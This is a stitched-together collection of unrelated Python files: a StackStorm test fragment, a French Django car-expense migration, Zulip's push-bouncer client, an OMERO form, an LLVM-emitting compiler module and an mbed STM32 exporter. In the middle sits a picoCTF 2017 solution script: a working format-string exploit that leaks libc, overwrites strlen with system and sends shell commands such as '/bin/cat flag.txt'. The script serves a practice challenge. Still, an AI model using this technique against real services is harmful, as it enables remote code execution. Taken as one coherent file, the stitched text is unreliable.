LiveAction.add_or_update(live_action_db)
ActionExecution.add_or_update(execution_db)
# Simulate policy "apply_after" run
self.policy.apply_after(target=live_action_db)
# Note: There should be no new objects since max retries has been reached
live_action_dbs = LiveAction.get_all()
action_execution_dbs = ActionExecution.get_all()
self.assertEqual(len(live_action_dbs), 1)
self.assertEqual(len(action_execution_dbs), 1)
self.assertEqual(action_execution_dbs[0].status, LIVEACTION_STATUS_TIMED_OUT)
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-07 21:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Consommation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('odometre', models.IntegerField()),
('quantite_essence', models.DecimalField(decimal_places=2, max_digits=5)),
('date_conso', models.DateField(default=django.utils.timezone.now)),
('prix_litre', models.DecimalField(decimal_places=2, max_digits=6)),
],
),
migrations.CreateModel(
name='Entretien',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(max_length=100)),
('montant', models.DecimalField(decimal_places=2, max_digits=5)),
('date_frais', models.DateField(default=django.utils.timezone.now)),
],
),
migrations.CreateModel(
name='Voiture',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('marque', models.CharField(max_length=20)),
('type', models.CharField(max_length=20)),
('annee', models.IntegerField()),
('petit_nom', models.CharField(max_length=20)),
('odometre_depart', models.IntegerField()),
('date_achat', models.DateField(default=django.utils.timezone.now)),
('cout_achat', models.DecimalField(decimal_places=2, max_digits=8)),
],
),
migrations.AddField(
model_name='entretien',
name='voiture',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='voiture.Voiture'),
),
migrations.AddField(
model_name='consommation',
name='voiture',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='voiture.Voiture'),
),
]
import logging
import urllib
from typing import Any, Dict, List, Mapping, Tuple, Union
import orjson
import requests
from django.conf import settings
from django.forms.models import model_to_dict
from django.utils.translation import gettext as _
from analytics.models import InstallationCount, RealmCount
from version import ZULIP_VERSION
from zerver.lib.exceptions import JsonableError
from zerver.lib.export import floatify_datetime_fields
from zerver.models import RealmAuditLog
class PushNotificationBouncerException(Exception):
pass
class PushNotificationBouncerRetryLaterError(JsonableError):
http_status_code = 502
def send_to_push_bouncer(
method: str,
endpoint: str,
post_data: Union[bytes, Mapping[str, Union[str, bytes]]],
extra_headers: Mapping[str, str] = {},
) -> Dict[str, object]:
"""While it does actually send the notice, this function has a lot of
code and comments around error handling for the push notifications
bouncer. There are several classes of failures, each with its own
potential solution:
* Network errors with requests.request. We raise an exception to signal
it to the callers.
* 500 errors from the push bouncer or other unexpected responses;
we don't try to parse the response, but do make clear the cause.
* 400 errors from the push bouncer. Here there are 2 categories:
Our server failed to connect to the push bouncer (should throw)
vs. client-side errors like an invalid token.
"""
url = urllib.parse.urljoin(
settings.PUSH_NOTIFICATION_BOUNCER_URL, "/api/v1/remotes/" + endpoint
)
api_auth = requests.auth.HTTPBasicAuth(settings.ZULIP_ORG_ID, settings.ZULIP_ORG_KEY)
headers = {"User-agent": f"ZulipServer/{ZULIP_VERSION}"}
headers.update(extra_headers)
try:
res = requests.request(
method, url, data=post_data, auth=api_auth, timeout=30, verify=True, headers=headers
)
except (
requests.exceptions.Timeout,
requests.exceptions.SSLError,
requests.exceptions.ConnectionError,
) as e:
raise PushNotificationBouncerRetryLaterError(
f"{e.__class__.__name__} while trying to connect to push notification bouncer"
)
if res.status_code >= 500:
# 500s should be resolved by the people who run the push
# notification bouncer service, and they'll get an appropriate
# error notification from the server. We raise an exception to signal
# to the callers that the attempt failed and they can retry.
error_msg = "Received 500 from push notification bouncer"
logging.warning(error_msg)
raise PushNotificationBouncerRetryLaterError(error_msg)
elif res.status_code >= 400:
# If JSON parsing errors, just let that exception happen
result_dict = orjson.loads(res.content)
msg = result_dict["msg"]
if "code" in result_dict and result_dict["code"] == "INVALID_ZULIP_SERVER":
# Invalid Zulip server credentials should email this server's admins
raise PushNotificationBouncerException(
_("Push notifications bouncer error: {}").format(msg)
)
else:
# But most other errors coming from the push bouncer
# server are client errors (e.g. never-registered token)
# and should be handled as such.
raise JsonableError(msg)
elif res.status_code != 200:
# Anything else is unexpected and likely suggests a bug in
# this version of Zulip, so we throw an exception that will
# email the server admins.
raise PushNotificationBouncerException(
f"Push notification bouncer returned unexpected status code {res.status_code}"
)
# If we don't throw an exception, it's a successful bounce!
return orjson.loads(res.content)
def send_json_to_push_bouncer(method: str, endpoint: str, post_data: Mapping[str, object]) -> None:
send_to_push_bouncer(
method,
endpoint,
orjson.dumps(post_data),
extra_headers={"Content-type": "application/json"},
)
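# Illustrative sketch (added example; the endpoint name is hypothetical): the
# helper JSON-encodes the payload and sets the Content-type header, so
# callers pass plain dicts:
#     send_json_to_push_bouncer("POST", "server/example", {"server_id": 42})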
REALMAUDITLOG_PUSHED_FIELDS = [
"id",
"realm",
"event_time",
"backfilled",
"extra_data",
"event_type",
]
def build_analytics_data(
realm_count_query: Any, installation_count_query: Any, realmauditlog_query: Any
) -> Tuple[List[Dict[str, Any]], List[Dict[str, Any]], List[Dict[str, Any]]]:
# We limit the batch size on the client side to avoid OOM kills, timeouts, etc.
MAX_CLIENT_BATCH_SIZE = 10000
data = {}
data["analytics_realmcount"] = [
model_to_dict(row) for row in realm_count_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE]
]
data["analytics_installationcount"] = [
model_to_dict(row)
for row in installation_count_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE]
]
data["zerver_realmauditlog"] = [
model_to_dict(row, fields=REALMAUDITLOG_PUSHED_FIELDS)
for row in realmauditlog_query.order_by("id")[0:MAX_CLIENT_BATCH_SIZE]
]
floatify_datetime_fields(data, "analytics_realmcount")
floatify_datetime_fields(data, "analytics_installationcount")
floatify_datetime_fields(data, "zerver_realmauditlog")
return (
data["analytics_realmcount"],
data["analytics_installationcount"],
data["zerver_realmauditlog"],
)
def send_analytics_to_remote_server() -> None:
# first, check what's latest
try:
result = send_to_push_bouncer("GET", "server/analytics/status", {})
except PushNotificationBouncerRetryLaterError as e:
logging.warning(e.msg)
return
last_acked_realm_count_id = result["last_realm_count_id"]
last_acked_installation_count_id = result["last_installation_count_id"]
last_acked_realmauditlog_id = result["last_realmauditlog_id"]
(realm_count_data, installation_count_data, realmauditlog_data) = build_analytics_data(
realm_count_query=RealmCount.objects.filter(id__gt=last_acked_realm_count_id),
installation_count_query=InstallationCount.objects.filter(
id__gt=last_acked_installation_count_id
),
realmauditlog_query=RealmAuditLog.objects.filter(
event_type__in=RealmAuditLog.SYNCED_BILLING_EVENTS, id__gt=last_acked_realmauditlog_id
),
)
if len(realm_count_data) + len(installation_count_data) + len(realmauditlog_data) == 0:
return
request = {
"realm_counts": orjson.dumps(realm_count_data).decode(),
"installation_counts": orjson.dumps(installation_count_data).decode(),
"realmauditlog_rows": orjson.dumps(realmauditlog_data).decode(),
"version": orjson.dumps(ZULIP_VERSION).decode(),
}
# Send the gathered data (entries with IDs greater than the acked ones) to the bouncer
try:
send_to_push_bouncer("POST", "server/analytics", request)
except JsonableError as e:
logging.warning(e.msg)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2011-2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from django import forms
from django.utils.encoding import smart_str
from django.forms.util import ErrorDict, ValidationError
from django.forms.fields import FileField, CharField
class NonASCIIForm(forms.Form):
def __init__(self, *args, **kwargs):
super(NonASCIIForm, self).__init__(*args, **kwargs)
def full_clean(self):
"""
Cleans all of self.data and populates self._errors and
self.cleaned_data.
"""
self._errors = ErrorDict()
if not self.is_bound: # Stop further processing.
return
self.cleaned_data = {}
# If the form is permitted to be empty, and none of the form data has
# changed from the initial data, short circuit any validation.
if self.empty_permitted and not self.has_changed():
return
for name, field in self.fields.items():
# value_from_datadict() gets the data from the data dictionaries.
# Each widget type knows how to retrieve its own data, because
# some widgets split data over several HTML fields.
value = field.widget.value_from_datadict(
self.data, self.files, self.add_prefix(name))
try:
if isinstance(field, FileField):
initial = self.initial.get(name, field.initial)
value = field.clean(value, initial)
elif isinstance(field, CharField):
if (value is not None and
isinstance(value, basestring) and len(value) > 0):
value = str(smart_str(value))
else:
value = field.clean(value)
else:
value = field.clean(value)
self.cleaned_data[name] = value
if hasattr(self, 'clean_%s' % name):
value = getattr(self, 'clean_%s' % name)()
self.cleaned_data[name] = value
except ValidationError, e:
self._errors[name] = self.error_class(e.messages)
if name in self.cleaned_data:
del self.cleaned_data[name]
try:
self.cleaned_data = self.clean()
except ValidationError, e:
self._errors[forms.Form.NON_FIELD_ERRORS] = \
self.error_class(e.messages)
if self._errors:
delattr(self, 'cleaned_data')
import struct, time
from socket import *
def recv_timeout(the_socket,timeout=2):
the_socket.setblocking(0)
total_data=[];
data='';
begin=time.time()
while 1:
if total_data and time.time()-begin > timeout:
break
elif time.time()-begin > timeout*2:
break
try:
data = the_socket.recv(8192)
if data:
total_data.append(data)
begin = time.time()
else:
time.sleep(0.1)
except:
pass
the_socket.setblocking(1)
return ''.join(total_data)
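#Illustrative usage sketch (added example; host/port are placeholders):
#sock = socket(AF_INET, SOCK_STREAM)
#sock.connect(('example.com', 80))
#sock.send('GET / HTTP/1.0\r\n\r\n')
#banner = recv_timeout(sock, timeout=2)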
def indicator(exploit):
return "ABCD"+exploit+"EFGH"
def value(reply):
start = reply.index("ABCD")+4
end = reply.index("EFGH")
return reply[start:end]
s = socket(AF_INET, SOCK_STREAM)
s.connect(('shell2017.picoctf.com', 44887))
#PAYLOAD 1: Write PRINTF_PLT to a location
#134519023
exploit = "%134519023x%9$n"
s.send(exploit+'\n')
recv_timeout(s)
#print s.recv(4096)
#DEBUG 1: Read Written Data
exploit = indicator("%16$x")
s.send(exploit+'\n')
print value(s.recv(2048))
#Should print 0x08049970
#PAYLOAD 2: Get the 'printf' libc address
exploit = indicator("%16$s")
s.send(exploit+'\n')
data = value(s.recv(2048))
data = data[0:4]
printf_libc =''
for c in data:
printf_libc = hex(ord(c))[2:] + printf_libc
print printf_libc
#Calculate base libc address
base_libc = int(printf_libc, 16) - 0x4cc70
print hex(base_libc)
#Calculate 'system' libc address
system_libc = base_libc + 0x3e3e0
print hex(system_libc)
#PAYLOAD 3: Write STRLEN_PLT to a location
#39151, 39155, 39167, 39171, 39179
exploit = "%39167x%9$hn"
s.send(exploit+'\n')
recv_timeout(s)
#print s.recv(4096)
#DEBUG 3: Read Written Data
exploit = indicator("%16$x")
s.send(exploit+'\n')
print value(s.recv(2048))
#Should print 0x804998c
#PAYLOAD 4: Overwrite the 'strlen' with 'system'
portion = system_libc // 10
remainder = system_libc % 10
exploit = "; /bin/cat flag.txt #"
exploit += ("%"+str(portion)+"x")*9
exploit += "%"+str(portion+remainder-150)+"x%16$n"
s.send(exploit+'\n')
data = recv_timeout(s)
print "".join(data.split())
#PAYLOAD 5: Execute shell commands
print "Sending Final Payload"
exploit = "; /bin/ls #"
s.send(exploit+'\n')
data = recv_timeout(s)
print "".join(data.split())
print "Completed"
s.close()
import grammar
import contextlib
import collections
import util
import datamodel
import copy
import os
import functools
#Underlying machinery for tracking TU state and emitting LLVM code.
class Variable:
#Holds a LLVM identifier, OType pair
def __init__(self, var, type):
self.name=var
self.type=type
def __str__(self):
return "Var({} {})".format(self.type, self.name)
def __repr__(self):
return str(self)
class Emitter:
#Workhorse of the actual emitting process. Passed around as out so as to be theoretically reentrant.
#Tracks variables, globals, function prototypes, included files, contexts (indent etc), scopes
class _IndentContext:
#Helper so that one can write
#with out.context():
# #Do something
#Just pops the last context off the context map chain when it returns (if no error)
def __init__(self, emitter):
self.emitter=emitter
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if traceback: return
del self.emitter.context_map.maps[0]
class _ScopeContext:
#Same as above, but for scope
def __init__(self, emitter):
self.emitter=emitter
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if traceback: return
del self.emitter.scopes.maps[0]
def __init__(self, fd, options):
#Construct an emitter, outputting to the file fd
self.fd=fd
self.indent_context_manager=Emitter._IndentContext(self)
self.scope_context_manager=Emitter._ScopeContext(self)
#The context chainmap is a series of maps, where the current state
# (file, line, class, method, etc) is readable by indexing into the
# chain. This allows nested contexts, for example a method in a class
# in an included file in an included file in an included file, and for
# it all to be sorted out at the end of those scopes.
#Create a context by doing
#with emitter.context(line=foo, file=bar, method=baz):
# #Do stuff that will call emitter.emit*
# and then the emitted lines will have the correct context/debugging
# info attached
self.context_map=collections.ChainMap({
"indent":0,
"line":"u",
"file":"u",
"ns":"u",
"class":"u",
"method":"u",
"astblock":"u",
"path":"./"
})
self.temp_count=0 #Number of temporary (for SSA) variables we've allocated
self.last_line=-1 #Debug helper
self.last_file=-1 #Debug helper
self.last_method=-1 #Debug helper
self.options=options
#Same idea as the context maps. Provides a stack of orth_var_name:Variable
# mappings that (as a virtue of being a stack) respect local declarations over
# global names.
#Contains global variables in the last element in the chain (scopes.maps[-1])
self.scopes=collections.ChainMap({})
self.signatures={} #Map of name->Variable for functions
self.global_statments=[] #Stuff to stick at the end of the file (e.g. string literals)
self.included_files=[] #Files whose contents have actually been emitted
self.prepared_files=[] #Files whose prototypes/globals have been emitted, and signatures loaded
#(all files will have that preparation transformation applied before _any_ are actually
# "included")
self.defined_files=[]
self.ast_cache={} #Cache of filename (non-mangled)->ASTNode for files
self.path_cache={} #Cache of include_name->File path for imports
self.types=copy.copy(datamodel.builtin_types) #Dictionary of orth_type_name:OTypes of the types available (globally)
#in the program
self.searchpath=["."] #Search path for imported modules (using import name, as opposed to import "relative_path")
self.startup_functions=[]
if not options.get("no0double", False):
self.emitl("@_the_zero_double = global double 0.0")
if "path" in options:
self.searchpath=options["path"]
def emit(self, text):
self.fd.write(text)
def emitindent(self):
self.emit("\t"*self.context_map['indent'])
def emitl(self, line):
self.emitindent()
self.emit(line)
self.emit("\t\t;from "+self.context_map['file']+":"+str(self.context_map['line']))
self.emit("\n")
def context(self, indent_by=1, **kwargs):
#Create and push a context on to the context map chain stack. Automatically indents +1 if not otherwise specified
if 'indent' not in kwargs:
kwargs['indent']=self.context_map['indent']+indent_by
self.context_map.maps.insert(0, kwargs)
self.last_line=self.context_map["line"]
self.last_file=self.context_map["file"]
self.last_method=self.context_map["method"]
return self.indent_context_manager #This function returns a context manager that automatically pops the context when the block ends
def indent(self, by=1):
return self.context(indent_by=by)
def get_name(self):
#Get a non-conflicting SSA name
self.temp_count+=1
return "f{}_m{}_l{}_n{}".format(
self.context_map['file'],
self.context_map['method'],
self.context_map['line'],
self.temp_count
)
def get_temp_name(self):
#Get a non-conflicting SSA name for an intermediate variable
return "temp_"+self.get_name()
def scope(self):
#Create a scope and push it onto the scope chain map stack
self.scopes.maps.insert(0, {})
return self.scope_context_manager
def set_var_name(self, vname, aname, type):
#Create a variable (in the topmost scope) and register its type
self.scopes.maps[0][vname]=Variable(aname, type)
def set_signature(self, fname, type):
self.signatures[fname]=Variable("@"+fname, type)
def set_global_var_name(self, vname, aname, type):
#Create a global and register its type
self.scopes.maps[-1][vname]=Variable(aname, type)
def get_var_name(self, vname):
#Get the LLVM identifier for a variable (returns the identifier (which never
# shadow each other) of the variable in the topmost scope containing one named
# `vname`)
return self.scopes[vname].name
def get_var_type(self, vname):
#Same behavior as get_var_name, but returns the OType of the variable
return self.scopes[vname].type
def get_var(self, vname):
#Same behavior as get_var_name, but returns the whole Variable object
return self.scopes[vname]
def add_global_stmt(self, text):
#Stick a global statement onto the list for emitting at the end (e.g. string literals)
self.global_statments.append(text)
def emit_global_statments(self):
#Emit all the cached global statements
for stmt in self.global_statments:
self.emitl(stmt)
#Mapping of ASTNode type -> Transformer type
#Is a one-to-one mapping, but in some cases a transformer may match a more specific subclass of a ASTNode than another
# (in that case we always want the more specific match)
transformers={}
class TransformerMeta(type):
#Metaclass for transformers that registers it
def __new__(self, name, bases, classdict):
cls = type.__new__(self, name, bases, classdict)
if cls.transforms is not None:
if isinstance(cls.transforms, list):
for nodetype in cls.transforms:
transformers[nodetype]=cls
else:
transformers[cls.transforms]=cls
return cls
class Transformer(metaclass=TransformerMeta):
transforms=None #This is either a single ASTNode subclass or a list of them that this Transformer is capable of matching
def __init__(self, node, parent):
self.node=node
self.parent=parent
def transform(self, out):
#Returns an LLVM identifier string for the value of this ASTNode (assuming it has one), otherwise None
pass
def transform_address(self, out):
#Required for stuff that can be the LHS of an AssignmentExpr. Should return an LLVM identifier string
# for a local variable of type <get_type()>*, referring to the memory address of the location its value
# is stored at
pass
def prepare(self, out):
#Not required. For function decls, global decls, and files this will be called at import-resolution time
# (as opposed to include-time) and should be used to declare types and variables etc
pass
@staticmethod
def get_type(node, out):
#Returns a OType that is the type of the variable returned by transform()
pass
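# How registration works (a hedged sketch): merely defining a subclass with
# `transforms` set adds it to the `transformers` map via TransformerMeta.
# `IntLiteral` here is a hypothetical ASTNode subclass, not defined in this file:
#
#   class IntLiteralTransformer(Transformer):
#       transforms = IntLiteral
#       def transform(self, out):
#           name = out.get_temp_name()
#           out.emitl("%{} = add i64 0, {}".format(name, self.node.value))
#           return "%" + name
#       @staticmethod
#       def get_type(node, out):
#           return out.types["int"]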
def get_transformer_cls(node):
match=None
for item in transformers.keys():
if isinstance(node, item) and (match is None or issubclass(item, match)):
match=item
if match is None:
raise IndexError("No transformer for %s of type %s"%(str(node), str(type(node))))
return transformers[match]
def get_transformer(node, parent):
return get_transformer_cls(node)(node, parent)
def emit(out, node, parent=None):
return get_transformer(node, parent).transform(out)
def emit_project(out, node, parent=None):
    transformer = get_transformer(node, parent)
    transformer.define(out)
    transformer.prepare(out)
    return transformer.transform(out)
def get_type(node, out):
if isinstance(node, str):
return out.types[node]
if isinstance(node, datamodel.OType):
return node
res = get_transformer_cls(node).get_type(node, out)
if isinstance(res, datamodel.OType):
return res
return out.types[res]
def do_var_alloc(out, varname, type):
name="var_"+out.get_name()+"___"+varname
out.emitl("%{} = alloca {}".format(name, type.get_llvm_representation()))
out.set_var_name(varname, "%"+name, type)
return "%"+name
def call_func(name, argtypes, args, out):
arg_values=[]
for idx, arg in enumerate(args):
arg_values.append(argtypes[idx]+" "+arg)
return "call {} @{}({}) ;call_func".format(
out.signatures[name].type.get_llvm_representation(),
name,
",".join(arg_values)
)
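# Example of the emitted instruction (assuming @add was registered with an i64
# return type via set_signature):
#   call_func("add", ["i64", "i64"], ["%a", "%b"], out)
#   -> 'call i64 @add(i64 %a,i64 %b) ;call_func'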
def resolve_import(import_node, out):
if import_node.absolute:
return import_node.identifier.replace("$",os.path.dirname(out.context_map["path"]))
else:
if import_node.identifier in out.path_cache:
return out.path_cache[import_node.identifier]
for dir in out.searchpath:
if os.path.isdir(dir):
if import_node.identifier+".ort" in os.listdir(dir):
result=os.path.join(dir, import_node.identifier+".ort")
out.path_cache[import_node.identifier]=result
return result
elif import_node.identifier in os.listdir(dir):
result=os.path.join(os.path.join(dir, import_node.identifier), "__init__.ort")
out.path_cache[import_node.identifier]=result
return result
raise ImportError("No module `%s' found on search path"%import_node.identifier)
def sanitize_fn(fn):
return fn.strip().replace(".ort","").replace("/","").replace(".","").replace("\\","").replace(" ","")
def ret_local(fn):
    #Wrap a transform or transform_address function that returns the name of a local SSA
    # variable without the leading '%' and prepend one.
@functools.wraps(fn)
def _wrapped(*a, **k):
return "%"+fn(*a, **k)
    return _wrapped
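# Typical use of the decorator (hedged sketch; `SomeNode` is a hypothetical
# ASTNode subclass, not defined in this file):
#
#   class SomeNodeTransformer(Transformer):
#       transforms = SomeNode
#       @ret_local
#       def transform(self, out):
#           name = out.get_temp_name()
#           out.emitl("%{} = add i64 0, 0".format(name))
#           return name          # the caller receives "%" + name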
"""
mbed SDK
Copyright (c) 2011-2017 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function, absolute_import
from builtins import str
from os.path import splitext, basename, relpath, join
import shutil
from tools.utils import mkdir
from tools.export.gnuarmeclipse import GNUARMEclipse
from tools.export.gnuarmeclipse import UID
from tools.build_api import prepare_toolchain
from tools.targets import TARGET_MAP
from sys import platform
# Global random number generator instance.
u = UID()
class Sw4STM32(GNUARMEclipse):
"""
Sw4STM32 class
"""
NAME = 'Sw4STM32'
TOOLCHAIN = 'GCC_ARM'
BOARDS = {
'B96B_F446VE':
{
'name': 'B96B-F446VE',
'mcuId': 'STM32F446VETx'
},
'DISCO_F051R8':
{
'name': 'STM32F0DISCOVERY',
'mcuId': 'STM32F051R8Tx'
},
'DISCO_F303VC':
{
'name': 'STM32F3DISCOVERY',
'mcuId': 'STM32F303VCTx'
},
'DISCO_F334C8':
{
'name': 'STM32F3348DISCOVERY',
'mcuId': 'STM32F334C8Tx'
},
'DISCO_F401VC':
{
'name': 'STM32F401C-DISCO',
'mcuId': 'STM32F401VCTx'
},
'DISCO_F407VG':
{
'name': 'STM32F4DISCOVERY',
'mcuId': 'STM32F407VGTx'
},
'DISCO_F413ZH':
{
'name': 'DISCO_F413',
'mcuId': 'STM32F413ZHTx'
},
'DISCO_F429ZI':
{
'name': 'STM32F429I-DISCO',
'mcuId': 'STM32F429ZITx'
},
'DISCO_F469NI':
{
'name': 'DISCO-F469NI',
'mcuId': 'STM32F469NIHx'
},
'DISCO_F746NG':
{
'name': 'STM32F746G-DISCO',
'mcuId': 'STM32F746NGHx'
},
'DISCO_F769NI':
{
'name': 'DISCO-F769NI',
'mcuId': 'STM32F769NIHx'
},
'DISCO_L053C8':
{
'name': 'STM32L0538DISCOVERY',
'mcuId': 'STM32L053C8Tx'
},
'DISCO_L072CZ_LRWAN1':
{
'name': 'DISCO-L072CZ-LRWAN1',
'mcuId': 'STM32L072CZTx'
},
'MTB_MURATA_ABZ':
{
'name': 'MTB-MURATA-ABZ',
'mcuId': 'STM32L0x2xZ'
},
'DISCO_L475VG_IOT01A':
{
'name': 'STM32L475G-DISCO',
'mcuId': 'STM32L475VGTx'
},
'DISCO_L476VG':
{
'name': 'STM32L476G-DISCO',
'mcuId': 'STM32L476VGTx'
},
'NUCLEO_F030R8':
{
'name': 'NUCLEO-F030R8',
'mcuId': 'STM32F030R8Tx'
},
'NUCLEO_F031K6':
{
'name': 'NUCLEO-F031K6',
'mcuId': 'STM32F031K6Tx'
},
'NUCLEO_F042K6':
{
'name': 'NUCLEO-F042K6',
'mcuId': 'STM32F042K6Tx'
},
'NUCLEO_F070RB':
{
'name': 'NUCLEO-F070RB',
'mcuId': 'STM32F070RBTx'
},
'NUCLEO_F072RB':
{
'name': 'NUCLEO-F072RB',
'mcuId': 'STM32F072RBTx'
},
'NUCLEO_F091RC':
{
'name': 'NUCLEO-F091RC',
'mcuId': 'STM32F091RCTx'
},
'NUCLEO_F103RB':
{
'name': 'NUCLEO-F103RB',
'mcuId': 'STM32F103RBTx'
},
'NUCLEO_F207ZG':
{
'name': 'NUCLEO-F207ZG',
'mcuId': 'STM32F207ZGTx'
},
'NUCLEO_F302R8':
{
'name': 'NUCLEO-F302R8',
'mcuId': 'STM32F302R8Tx'
},
'NUCLEO_F303K8':
{
'name': 'NUCLEO-F303K8',
'mcuId': 'STM32F303K8Tx'
},
'NUCLEO_F303RE':
{
'name': 'NUCLEO-F303RE',
'mcuId': 'STM32F303RETx'
},
'NUCLEO_F303ZE':
{
'name': 'NUCLEO-F303ZE',
'mcuId': 'STM32F303ZETx'
},
'NUCLEO_F334R8':
{
'name': 'NUCLEO-F334R8',
'mcuId': 'STM32F334R8Tx'
},
'NUCLEO_F401RE':
{
'name': 'NUCLEO-F401RE',
'mcuId': 'STM32F401RETx'
},
'NUCLEO_F410RB':
{
'name': 'NUCLEO-F410RB',
'mcuId': 'STM32F410RBTx'
},
'NUCLEO_F411RE':
{
'name': 'NUCLEO-F411RE',
'mcuId': 'STM32F411RETx'
},
'NUCLEO_F413ZH':
{
'name': 'NUCLEO-F413ZH',
'mcuId': 'STM32F413ZHTx'
},
'NUCLEO_F429ZI':
{
'name': 'NUCLEO-F429ZI',
'mcuId': 'STM32F429ZITx'
},
'NUCLEO_F446RE':
{
'name': 'NUCLEO-F446RE',
'mcuId': 'STM32F446RETx'
},
'NUCLEO_F446ZE':
{
'name': 'NUCLEO-F446ZE',
'mcuId': 'STM32F446ZETx'
},
'NUCLEO_F746ZG':
{
'name': 'NUCLEO-F746ZG',
'mcuId': 'STM32F746ZGTx'
},
'NUCLEO_F767ZI':
{
'name': 'NUCLEO-F767ZI',
'mcuId': 'STM32F767ZITx'
},
'NUCLEO_L011K4':
{
'name': 'NUCLEO-L011K4',
'mcuId': 'STM32L011K4Tx'
},
'NUCLEO_L031K6':
{
'name': 'NUCLEO-L031K6',
'mcuId': 'STM32L031K6Tx'
},
'NUCLEO_L053R8':
{
'name': 'NUCLEO-L053R8',
'mcuId': 'STM32L053R8Tx'
},
'NUCLEO_L073RZ':
{
'name': 'NUCLEO-L073RZ',
'mcuId': 'STM32L073RZTx'
},
'MTB_RAK811':
{
'name': 'MTB-RAK-811',
'mcuId': 'STM32L151CBUxA'
},
'NUCLEO_L152RE':
{
'name': 'NUCLEO-L152RE',
'mcuId': 'STM32L152RETx'
},
'NUCLEO_L432KC':
{
'name': 'NUCLEO-L432KC',
'mcuId': 'STM32L432KCUx'
},
'MTB_ADV_WISE_1510':
{
'name': 'MTB-ADV-WISE-1510',
'mcuId': 'STM32L443xC'
},
'NUCLEO_L476RG':
{
'name': 'NUCLEO-L476RG',
'mcuId': 'STM32L476RGTx'
},
'NUCLEO_L486RG':
{
'name': 'NUCLEO-L486RG',
'mcuId': 'STM32L486RGTx'
},
'NUCLEO_L496ZG':
{
'name': 'NUCLEO-L496ZG',
'mcuId': 'STM32L496ZGTx'
},
'NUCLEO_L496ZG_P':
{
'name': 'NUCLEO-L496ZG',
'mcuId': 'STM32L496ZGTx'
},
'NUCLEO_L4R5ZI':
{
'name': 'NUCLEO-L4R5ZI',
'mcuId': 'STM32L4R5ZITx'
}
}
@classmethod
def is_target_supported(cls, target_name):
target = TARGET_MAP[target_name]
target_supported = bool(set(target.resolution_order_names)
.intersection(set(cls.BOARDS.keys())))
toolchain_supported = cls.TOOLCHAIN in target.supported_toolchains
return target_supported and toolchain_supported
def __gen_dir(self, dir_name):
"""
        Create a directory under the export directory.
"""
settings = join(self.export_dir, dir_name)
mkdir(settings)
def get_fpu_hardware(self, fpu_unit):
"""
Convert fpu unit name into hardware name.
"""
hw = ''
fpus = {
'fpv4spd16': 'fpv4-sp-d16',
'fpv5d16': 'fpv5-d16',
'fpv5spd16': 'fpv5-sp-d16'
}
if fpu_unit in fpus:
hw = fpus[fpu_unit]
return hw
def process_sw_options(self, opts, flags_in):
"""
Process System Workbench specific options.
System Workbench for STM32 has some compile options, which are not recognized by the GNUARMEclipse exporter.
Those are handled in this method.
"""
opts['c']['preprocess'] = False
if '-E' in flags_in['c_flags']:
opts['c']['preprocess'] = True
opts['cpp']['preprocess'] = False
if '-E' in flags_in['cxx_flags']:
opts['cpp']['preprocess'] = True
opts['c']['slowflashdata'] = False
if '-mslow-flash-data' in flags_in['c_flags']:
opts['c']['slowflashdata'] = True
opts['cpp']['slowflashdata'] = False
if '-mslow-flash-data' in flags_in['cxx_flags']:
opts['cpp']['slowflashdata'] = True
if opts['common']['optimization.messagelength']:
opts['common']['optimization.other'] += ' -fmessage-length=0'
if opts['common']['optimization.signedchar']:
opts['common']['optimization.other'] += ' -fsigned-char'
if opts['common']['optimization.nocommon']:
opts['common']['optimization.other'] += ' -fno-common'
if opts['common']['optimization.noinlinefunctions']:
opts['common']['optimization.other'] += ' -fno-inline-functions'
if opts['common']['optimization.freestanding']:
opts['common']['optimization.other'] += ' -ffreestanding'
if opts['common']['optimization.nobuiltin']:
opts['common']['optimization.other'] += ' -fno-builtin'
if opts['common']['optimization.spconstant']:
opts['common']['optimization.other'] += ' -fsingle-precision-constant'
if opts['common']['optimization.nomoveloopinvariants']:
opts['common']['optimization.other'] += ' -fno-move-loop-invariants'
if opts['common']['warnings.unused']:
opts['common']['warnings.other'] += ' -Wunused'
if opts['common']['warnings.uninitialized']:
opts['common']['warnings.other'] += ' -Wuninitialized'
if opts['common']['warnings.missingdeclaration']:
opts['common']['warnings.other'] += ' -Wmissing-declarations'
if opts['common']['warnings.pointerarith']:
opts['common']['warnings.other'] += ' -Wpointer-arith'
if opts['common']['warnings.padded']:
opts['common']['warnings.other'] += ' -Wpadded'
if opts['common']['warnings.shadow']:
opts['common']['warnings.other'] += ' -Wshadow'
if opts['common']['warnings.logicalop']:
opts['common']['warnings.other'] += ' -Wlogical-op'
if opts['common']['warnings.agreggatereturn']:
opts['common']['warnings.other'] += ' -Waggregate-return'
if opts['common']['warnings.floatequal']:
opts['common']['warnings.other'] += ' -Wfloat-equal'
opts['ld']['strip'] = False
